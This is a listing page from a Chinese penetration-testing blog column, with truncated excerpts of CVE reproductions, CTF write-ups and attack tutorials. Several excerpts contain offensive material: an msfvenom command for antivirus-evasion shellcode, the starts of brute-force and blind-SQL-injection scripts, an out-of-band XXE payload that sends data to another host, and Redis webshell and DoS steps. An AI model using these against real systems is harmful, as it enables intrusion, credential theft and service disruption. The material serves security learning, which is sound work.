
渗透测试
文章平均质量分 67
bbb07
行百里者半于九十
展开
-
【信息收集】从FoFa—API接口数据写入TXT和Excel
【信息收集】FoFa—API接口数据写入TXT和Excel原创 2022-07-21 15:31:36 · 903 阅读 · 0 评论 -
Ubuntu 16.04特定内核提权复现(CVE-2017-16995)
Ubuntu16.04版本存在本地提权漏洞,该漏洞存在于Linux内核带有的eBPFbpf(2)系统调用中,当用户提供恶意BPF程序使eBPF验证器模块产生计算错误,导致任意内存读写问题,攻击者通过普通用户权限可以利用该漏洞进行提升至高权限用户,获取root权限,目前,主要是Debian和Ubuntu版本受影响,Redhat和CentOS不受影响。进入/tmp目录,将linux-exploit-suggester-2.pl传输至tmp文件夹。通过Xftp建立远程连接,用户名hack,密码123456。...原创 2022-07-17 00:17:14 · 1247 阅读 · 0 评论 -
Scapy实现基于ARP/ICMP/TCP/UDP的活跃设备扫描技术,以及TCP全/半端口扫描
目录基于ARP的活跃设备发现基于ICMP的活跃设备发现基于TCP扫描的活跃设备发现基于UDP扫描的活跃设备发现Scapy实现端口扫描基于TCP全开端口扫描基于TCP半开端口扫描ARP:地址解析协议,ARP(Address Resolution Protocol)根据IP地址获取物理地址的一个TCP/IP协议,环境所在的设备如果只知道目的设备的IP地址却不知道其MAC地址的时候,可以通过这种协议,使用以太 广播包给网络上的每一台设备发送ARP数据包,获取其中符合条件的MAC地址,以保证通信的顺利进行ARP的工原创 2022-07-12 09:35:54 · 4426 阅读 · 0 评论 -
慢速拒绝服务攻击slowhttptest测试
安装openssl命令:apt-get install openssl安装libssl-dev命令:apt-get install libssl-dev如果出现以上的图,首先安装update安装update命令:apt-get update再执行apt-get install libssl-dev安装slowhttptestgit clone https://github.com/shekyan/slowhttptest.git cd slowhttptest./configure makema原创 2022-06-02 20:12:52 · 1153 阅读 · 2 评论 -
[CISCN2019 华北赛区 Day1 Web2]ikun以一道例题从JWT安全到Pickle反序列化
这道题前面几关还是挺简单的,主要重点是JWT安全和Pickle反序列化的问题,所以前面的关卡就简单描述一下步骤先去注册一个账户注册完账户后,我们就来到了第一关,刚开始本来想注册一个admin用户的,没想到已经被注册了,那么我猜接下来的内容会和admin有关了这里有一个提示,开局给了我们1000块,让我们去购买lv6,当前链接是http://29e104e9-b299-4014-b700-cc0b3892187b.node4.buuoj.cn:81/shop?page=2,每点击一次下一页,p原创 2022-05-22 23:23:18 · 1467 阅读 · 0 评论 -
Monstra CMS文件上传(vulfocus/monstra_cve_2020_13384的writeup)
环境:Vulfocus 漏洞威胁分析平台writeup开启环境随意注册一个用户,如果说记性不好的话(bushiwo)可以把账户名密码都设置为admin,邮箱随意直奔主题漏洞路径:http://123.58.236.76:48412/admin/ ,如果是和我一样注册的话,这里用户名和密码都是admin点击上传文件第一步,上传所需文件,第二步,抓包 注意:程序不允许'html', 'htm', 'js', 'jsb', 'mhtml', 'mht', 'p.原创 2022-05-04 23:09:59 · 2576 阅读 · 0 评论 -
Django JSONField SQL注入漏洞 复现 & 原理分析
关于这个漏洞前几天看了很多的文章,其实大部分payload是一样的,都是如何去构造,或者去命令执行复现一下,我一开始也是这样去做的,但是这个漏洞是怎么形成的,对我来说可能一知半解,或者说完全不了解,在后面学习的过程中感觉吃力又去补习了别的知识,比如Django的两个基类,ArrayField、JSONField,Json.objects.filter()和QuerySet相关的知识,包括ORM注入等等1/漏洞原理PostgreSQL、SQLite3、MySQL、Oracle,在大部分情况下,以上四种原创 2022-05-04 14:32:59 · 2570 阅读 · 0 评论 -
文件上传绕过安全狗的一些方法
目录安全狗的安装垃圾数据绕过:数据包溢出绕过:值匹配""的内容,后跟.php:多个filename,绕过匹配:白名单绕过:测试工具:Burpsuite,安全狗测试网站:在没有安全狗的情况下,上传1.Php,以文件大小写后缀上传,是不会被拦截的,如下图安全狗的安装安全狗地址:网站安全狗-网站安全防护,防后门|防SQL注入|防CC攻击|网马查杀|防篡改,选择windows操作系统,Apache版本选择4.0,一直默认安装即可在默认安装时,会跳出需要填写关于Ap原创 2022-04-28 15:11:31 · 4234 阅读 · 4 评论 -
[CVE-2022-22965]Spring远程代码执行漏洞复现
漏洞概述(级别:高危)续上一次Log4j2后,于2022年03月29日,Spring官方发布了Spring框架远程命令执行漏洞公告(CNVD-2022-23942、CVE-2022-22965)攻击者可以通过构造恶意请求来利用这些漏洞,从而造成任意代码执行,未经身份验证的攻击者可以使用此漏洞进行远程任意代码执行,该漏洞广泛存在于Spring框架以及衍生的框架中,JDK 9.0及以上版本会受到此漏洞影响FOFA语法app="APACHE-Tomcat" || app="vmware-Sprin原创 2022-04-26 11:23:12 · 5409 阅读 · 2 评论 -
74CMS模版注入漏洞复现
骑士cms人才系统,是一项基于php+mysql为核心开发的一套免费+开源业人才软件系统。软件具执行效率高、模板自由切换、后台管理功能方便等诸多优秀特点。全部代码都为骑士网络原创,有着完全的知识产权。凭借骑士网络的不断创新精神和认真的工作态度,骑士人才系统已成国内同类软件中的最好用的人才系统。该漏洞影响版本: CMS < 6.0.48漏洞复现url:http://目标IP地址/index.php?m=home&a=assign_resume_tpl以post方.原创 2022-04-15 13:24:43 · 1896 阅读 · 0 评论 -
Python免杀脚本生成.exe(过火绒过联想没过360)
方法:使用内存加载shellcodemsfvenom -p windows/x64/exec CMD='calc.exe' -f py -b '\x00\x0a'【这里执行弹出计算器的命令操作】-p 用于指定payloadcalc.exe用于执行弹出计算机操作-f 用于指定生成的shellcode的编译语言-b 用于禁止生成shellcode中易出现的被查杀软件检测的字符串-e 可以选择相应的编码器在pycharm内运行如下脚本import ctypesfrom.原创 2022-04-06 15:07:19 · 3912 阅读 · 0 评论 -
FTP口令破解脚本编写
import ftplibimport optparseimport threading# 使用匿名用户进行登录,如果登录成功则写入FtpSuccess.txt文件def CheckAnonymous(FTPserver): try: print('[-] checking user [anonymous] and password [anonymous]') f = ftplib.FTP(FTPserver) # 对主机发起连接,端口默认 .原创 2022-04-05 10:00:46 · 1203 阅读 · 0 评论 -
Pikachu靶场Login多线程爆破脚本编写
注意:需要在同目录下创建两个字典,一个是users.txt,一个是passwds.txt,运行该脚本时会从这两个文件内读取用户名与密码import osimport threadingimport requests# 定义分块大小BLOCK_SIZE = 800def pertition(ls, size): return [ls[i:i + size] for i in range(0, len(ls), size)]# 创建子线程任务类class Thread..原创 2022-03-26 15:13:16 · 2124 阅读 · 0 评论 -
时间盲注脚本(附带注释)
参考python安全攻防时间盲注,自己修改了一些内容,加入了异常处理防止乱跑# -*- coding: UTF-8 -*-import requestsimport timeDBName = "" # 数据库名的变量DBTables = []DBColumns = []DBData = {}requests.adapters.DEFAULT_RETRIES = 10conn = requests.session()conn.keep_alive = False # 设置重连原创 2022-03-22 23:33:31 · 2934 阅读 · 0 评论 -
外部实体注入(无回显类)复现
思路:与有回显的外部实体注入的区别在于,攻击的payload无法直接读取敏感信息。攻击者先将请求发送至目标服务器,目标服务器解析请求,读取192.168.200.1内的恶意DTD,并执行,将结果作为参数来访问192.168.200.1上的http服务,攻击者通过访问192.168.200.1的http记录得到结果首先在192.168.200.1上创建文件名为evil.xml内容为<!ENTITY % payload "<!ENTITY % send..原创 2022-03-19 22:32:33 · 1148 阅读 · 0 评论 -
Redis未授权访问漏洞是什么?如何复现(包括整理出在复现过程中遇到的各种问题)+编写扫描检测脚本
目录Redis未授权访问漏洞原理环境配通常来说置:CentOS下安装Redis手工未授权访问验证利用方式在攻击机中使用ssh免密登陆靶机利用漏洞写入webshell编写脚本检测未授权访问漏洞可以理解为安全配置不当、在需要进行权限认证处未对当前用户进行权限识别,导致攻击者在没有获取到登录权限或未授权的情况下,对目标进行操作或者被信息泄露常见的未授权漏洞:Redis 未授权访问漏洞MongoDB 未授权访问漏洞JBOSS 未授权访问漏洞VNC 未授权访问漏洞宝塔原创 2022-03-19 17:33:21 · 7172 阅读 · 2 评论 -
ZoomEye搜索引擎语法与脚本检索
全球网站都是由各种组件组成,比如用的哪种操作系统、哪种Web容器、什么服务端语言、什么Web应用等等,而ZoomEye是一个面向网络空间的搜索引擎,它允许使用公网设备指纹检索和web指纹检索web指纹检索语法web指纹识别包括应用名、版本、前后端框架、服务端语言与操作系统、容器、数据库等等语法 描述 示例 app:组件名 目标组件名称 app:"Apache httpd" ver:组件版本 目标组件版本号 ver:'2.2.17' site:网站域原创 2022-03-17 17:46:31 · 4790 阅读 · 0 评论 -
SSRF的详解、复现与CTF下的SSRF
借鉴于教父爱分享SSRF由攻击者构造,服务器端发起请求的安全漏洞,漏洞属于信息泄露的一种。一般情况下,SSRF的攻击目标大多是网站的内部系统(正因为请求是由服务器端发起的,所以服务器能请求到与自身相连而与外网隔离的内部系统),只要当前服务器有向其他服务器发送请求的地方都可能存在SSRF漏洞。SSRF形成的原因大多数都是由服务端提供了从其他服务器应用获取数据的操作,且没有对目标地址做过滤与限制,比如从指定URL地址获取网页文本内容,加载指定地址的图片文档等等举个例子:假设现在有两个网站原创 2021-12-11 11:57:18 · 6697 阅读 · 0 评论 -
Apache/IIS/Nginx中间件解析漏洞
目录IIS5.x/6.0解析漏洞Apache解析漏洞Nginx解析漏洞IIS7.5解析漏洞IIS5.x/6.0解析漏洞使用iis5.x-6.x版本的服务器大多为windows server 2003,由于网站比较古老,开发语句一般为asp,该解析漏洞只能解析asp文件,而不能解析aspx文件,得安装.net框架目录解析(6.0)形式:www.xxx.com/xx.asp/xx.jpg原理:服务器会默认把asp,asa目录下的文件都解析成asp文件例如创建一个文件夹,将原创 2021-12-07 14:12:46 · 7819 阅读 · 0 评论 -
关于使用IE浏览特制网页时允许远程执行代码漏洞(MS10-018)的复现
攻击机:kali靶机:windows xp sp2使用metasploit框架,需要启用metasploit所依赖的postgresql数据库在kali上启动postgresql命令【systemctl start postgresql】如果想查看postgresql是否开启可以使用【systemctl status postgresql】,这里显示active表示已经打开启动msfconsole搜索相应的模块这里有两个可利用的并且加载第一个模块,show opt.原创 2021-11-30 12:40:46 · 7003 阅读 · 3 评论 -
[MRCTF2020]Ezpop
pop链的利用多种魔术方法的了解__wakeup() //使用unserialize时触发__get() //用于从不可访问的属性读取数据__toString() //把类当作字符串使用时触发__invoke() //当脚本尝试将对象调用为函数时触发直接给出如下源码,先提示我们flag在flag.php下:Welcome to index.php<?php//flag is in flag.php//WTF IS THIS?//Learn From https://原创 2021-11-21 23:14:14 · 2378 阅读 · 0 评论 -
WEB渗透测试思维导图
分享链接:https://share.mubu.com/doc/1vn-5og9-w原创 2021-11-21 12:38:45 · 2756 阅读 · 0 评论 -
自己收集的后渗透之Meterpreter会话
系统常用命令获取cmd后常用命令网络命令其他常用脚本原创 2021-11-15 21:58:14 · 3101 阅读 · 0 评论 -
MS11-003在Internet Explorer中存在允许远程代码执行漏洞复现
漏洞描述利用IE(包含IE6、IE7、IE8)对CSS的解析存在的一个问题,使得任何访问包含非法CSS的页面导致IE奔溃重启,也就是说攻击者只需让用户访问一个特制的网页或者加载了一个非法的CSS的网页时,便可以获得与本地用户相同的权限受影响的系统 Windows XP SP 2 Windows XP SP 3 Windows Vista SP 1 Windows Vista SP 2 Windows Server 2008 Windows Se原创 2021-11-14 00:30:00 · 3050 阅读 · 0 评论 -
MS12-020远程桌面协议RDP代码执行导致系统蓝屏漏洞(CVE-2012-0002)
漏洞描述源于没有正确处理内存中的数据包导致的CVE-2012-0002漏洞,远程攻击者在未经认证的情况下往服务器发送特制的RDP报文,来访问未初始化或未删除的对象来触发漏洞,即可执行系统权限或者NET SERVICE权限任意命令,并以管理员权限查看、更改、删除数据受影响的系统 Microsoft Windows XP Microsoft Windows Vista Microsoft Windows Server 2003 Microsoft Windows Se原创 2021-11-10 13:16:54 · 10536 阅读 · 0 评论 -
WEB—无列名注入与过滤information_schema
一开始由于注册admin的时候,告知用户已被注册,以为需要爆破admin密码,失败后尝试万能密码,发现也不行。。。注册新用户后又对广告的xss研究半天,虽然怀疑过SQL,后来没想到真的是SQL注入知识点 无列名注入 过滤information_schema 随便注册一个账户登录,进去后可以发布广告【千万不要写入一个xss,弹来弹去,盲猜你们会尝试】发布一个广告名为:1',内容随意 点击广告详情,弹出关键报错信息,数据库为MariaDB继续注入,发布一个广告名为:.原创 2021-11-09 15:27:45 · 2847 阅读 · 0 评论 -
MS10-046文件快捷方式漏洞复现与利用
攻击机:kali靶机:windows xp sp2使用metasploit框架,需要启用metasploit所依赖的postgresql数据库在kali上启动postgresql命令【systemctl start postgresql】如果想查看postgresql是否开启可以使用【systemctl status postgresql】,这里显示active表示已经打开启动msfconsole搜索ms10-046相应的模块这里有两个可利用的模块,browser.原创 2021-11-07 12:02:11 · 5084 阅读 · 0 评论 -
[CISCN 2019 初赛]Love Math
<?phperror_reporting(0);//听说你很喜欢数学,不知道你是否爱它胜过爱flagif(!isset($_GET['c'])){ show_source(__FILE__);}else{ //例子 c=20-1 $content = $_GET['c']; if (strlen($content) >= 80) { die("太长了不会算"); } $blacklist = [' ', '\t', '\r.原创 2021-11-04 10:51:08 · 1502 阅读 · 0 评论 -
[WUSTCTF2020]朴实无华wp_弱类型、intval函数使用不当
知识点:intval函数绕过,php弱类型,空格绕过cat绕过题目一打开显示Hack me利用御剑扫出了robots.txt文件进入robots.txt提示进入/fAke_f1agggg.php,结果给出了一个假的flag在响应头内找到关键信息,/fl4g.php 访问之后获得源码:<?phpheader('Content-type:text/html;charset=utf-8');error_reporting(0);highligh原创 2021-11-03 11:42:06 · 3029 阅读 · 0 评论 -
[安洵杯 2019]easy_serialize_php反序列化对象逃逸
知识点:get与post传参反序列化漏洞反序列化中对象逃逸file_get_contents函数单击sourc_code跳出源码: <?php$function = @$_GET['f'];function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; ret原创 2021-11-02 11:08:06 · 3851 阅读 · 0 评论 -
Kali与MSF之信息收集
攻击机:linux kali靶机:win10、win7和metasploittable2kali内通过DNS或IP地址收集目标信息1、Whois用来查询域名注册信息数据库的工具,一般的域名注册信息会包含域名所有者、服务商、注册日期等等,这些信息在做渗透攻击之前是很有价值的注:进行whois查询时不能带有www、ftp等前缀,机构在注册域名时通常会注册一个上层域名,其子域名由自身的域名服务器管理,在whois数据库查询失败2、Nslookup(查询指定域名对应的ip地址)n原创 2021-10-31 12:00:24 · 5851 阅读 · 1 评论 -
[BJDCTF2020]Cookie is so stable
服务端模板注入攻击一道非常简单的模板注入,从cookie入手第一次见过,以后忘记了还可以捡起来刚开始做的时候,根据题目意思还以为是道传入XSS获取cookie的题,测试无果后看了一眼wp,发现其实是个存在于饼干的SSTIhint.php源码页面也给出了对应的提示首先在输入框输入admin,burp抓包再次刷新当前登录的页面可以看见,在cookie尾部新多了一个user=admin,测试是否是注入点输入{{7*'7'}},返回49可以判断为 Twig 模块输入{{7原创 2021-10-30 11:05:45 · 672 阅读 · 0 评论 -
XML、XXE注入与CTF下的XXE
在学习XXE漏洞之前,首先一起学习一下什么是XMLXML是什么?是种可扩展标记语言,本质上被设计用来传输、存储数据以及结构化,而非显示数据,可以简单理解为不能做任何事的纯文本常见的XML结构如下:<?xml version="1.0" encoding="utf-8"?>#XML声明<!DOCTYPE note [<!ELEMENT note (to,from,heading,body)><!ELEMENT to (#PCDATA)>&原创 2021-10-27 23:32:20 · 2128 阅读 · 0 评论 -
跨站脚本攻击(XSS)复现与防范、上海交通大学反射型与存储型xss案例
目录xss漏洞介绍XSS是什么XSS漏洞原理反射型XSS攻击复现存储型XSS攻击复现DOM型XSS攻击复现常用的XSS测试语句关于XSS的防御xss漏洞介绍跨站脚本攻击,英文全称是Cross Site Scripting,为了不和层叠样式表(Cascading Style Sheets,CSS)的缩写混淆,故将跨站脚本攻击缩写为XSSXSS攻击,通常指的是攻击者通过“HTML注入”篡改网页,插入恶意脚本,代码注入的一种攻击手段,当其他用户浏览网页时就会受影响原创 2021-10-24 12:39:27 · 9159 阅读 · 15 评论 -
[网鼎杯 2020 朱雀组]之phpweb两种不同的解题方式
目录方法一:方法二:知识点:1)黑名单取巧绕过2)PHP的file_get_contents函数使用3)PHP序列化与反序列化构造访问靶机,观察页面,开始时首先加载了一张图片,随后刷新回显时间,并且网页每隔一段时间会刷新一次,频率大概五秒一次F12查看源码,和观察的一样,setTimeout("document.form1.submit()",5000)每隔五秒钟将会提交一次form1,然后是一串时间字符串2021-10-20 12:14:50 pm.原创 2021-10-21 00:23:15 · 8992 阅读 · 4 评论 -
自己收集的一些常见SQL注入方式(持续更新中,增加了无列名注入和Timing Attack注入)
目录注入点位置及发现判断输入点是否存在注入测试数值型:字符型:group_concat注入:union注入:limit注入:报错注入:布尔注入:时间注入:堆查询注入:宽字节注入:base64注入:Cookie注入、Referer注入、UA注入、XFF注入预编译注入:Handler注入(从表名查询字段名):SQL绕过WAF通过SQL语句读写文件注入点位置及发现: GET参数注入 POST参数注入 use.原创 2021-10-19 19:10:11 · 2176 阅读 · 0 评论 -
[BJDCTF2020]Mark loves cat变量覆盖
首先用dirsearch扫描下目录由于BUUCTF限制发包量,更改扫描线程命令:python dirsearch .py -u [url] -e * -t 3 -s 0.2,扫除/.git泄露得到两个php文件,kali内githack扫出来但是下载失败了flag.php<?php$flag = file_get_contents('/flag');?>index.php<?phpinclude 'flag.php';$yds = ..原创 2021-10-18 19:24:48 · 1073 阅读 · 1 评论 -
preg_replace /e模式下代码漏洞
<?phperror_reporting(0);$text = $_GET["text"];//以get方式提交text$file = $_GET["file"];//以get方式提交fileif(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){//file_get_content需要读到一个$text传来的内容为I have a dream的文件 echo "<br>...原创 2021-10-17 22:35:40 · 1231 阅读 · 1 评论 -
[HCTF 2018]admin——Unicode欺骗
一、暴力破解基于表单的暴力破解缺少验证码匹配,无登录次数限制等等条件,可以对用户名或密码暴力破解burp抓包设置target原创 2021-10-16 22:53:49 · 1435 阅读 · 0 评论 -
Sqlmap入土详解
Sqlmap注入常用参数参数 作用 -u [url] 扫描指定的URL地址,判断是否存在注入 --dump 存储DBMS数据库的表中条目 --dbs 获取当前用户下所有数据库名称 --users 获取数据库的所有用户 --tables 查询表 --columns 查询字段 -D 指定数据库名 -T 指定表名 -C 指定字段名 其余参数原创 2021-10-10 21:57:38 · 1466 阅读 · 2 评论